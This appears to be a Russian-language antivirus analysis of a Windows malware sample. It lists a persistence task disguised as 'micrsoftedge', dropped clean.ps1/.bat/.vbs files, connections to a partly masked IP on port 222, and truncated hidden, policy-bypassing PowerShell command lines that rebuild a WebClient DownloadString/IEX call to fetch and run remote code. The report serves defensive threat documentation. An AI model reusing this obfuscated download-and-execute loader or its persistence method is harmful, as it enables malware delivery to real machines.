Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\micrsoftedge
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\clean.ps1
- C:\users\public\clean.bat
- C:\users\public\clean.vbs
Сетевая активность
Подключается к
- '51.##5.76.65':222
TCP
Запросы HTTP GET
- http://51.###.76.65:222/Clean/Clean.txt via 51.##5.76.65
- http://51.###.76.65:222/Clean/cln.jpg via 51.##5.76.65
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://51.##5.76.65:222/Clean/cln.jpg'')'.RePLACe('VA...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://51.##5.76.65:222/Clean/cln.jpg'')'.RePLACe('VA...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://51.##5.76.65:222/Clean/cln.jpg'')'.RePLACe('VAN','ADSTRING');[BY...
